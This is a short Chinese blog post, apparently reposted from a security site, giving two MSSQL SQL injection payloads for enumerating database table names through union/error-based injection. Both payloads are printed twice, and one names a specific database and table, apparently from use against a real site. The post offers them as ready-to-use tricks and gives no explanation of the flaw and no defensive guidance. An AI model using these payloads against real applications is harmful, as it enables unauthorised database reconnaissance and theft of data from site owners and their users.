MSSQL注入技巧两则

颓废 2019年5月19日09:17:26评论510 views字数 553阅读1分50秒阅读模式
摘要

2011年研究得出的爆表技巧 //爆破表语句 Feihacker' union select top 1 table_name from information_schema.tables where (select top 3 cast(name as varchar(526)) from (select top 1 id,name from [数据库名].[dbo].sysobjects where xtype=char(85) and status>=0 order by id)t order by id desc)=0-- //爆破所有表 在not in 里面换表名 一个一个爆破 Feihacker' union select top 1 table_name from information_schema.tables where (select top 1 cast(name as varchar(526)) from (select top 1 name from [数据库名].[dbo].sysobjects where xtype=char(85)and status>=0 and name not in (select name from [jinluvip].[dbo].sysobjects where xtype=char(85) and status>=0 and name ='BonusPeriod' ))t )=0--

2011年研究得出的爆表技巧

//爆破表语句 Feihacker' union select top 1 table_name from information_schema.tables where (select top 3 cast(name as varchar(526)) from (select top 1 id,name from [数据库名].[dbo].sysobjects where xtype=char(85) and status>=0 order by id)t order by id desc)=0-- 
//爆破所有表 在not in 里面换表名 一个一个爆破   Feihacker' union select top 1 table_name from information_schema.tables where  (select top 1 cast(name as varchar(526)) from (select top 1 name from [数据库名].[dbo].sysobjects where xtype=char(85)and status>=0 and name not in (select name from [jinluvip].[dbo].sysobjects where xtype=char(85) and status>=0 and name ='BonusPeriod' ))t )=0--

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日09:17:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MSSQL注入技巧两则https://cn-sec.com/archives/68124.html

发表评论

匿名网友 填写信息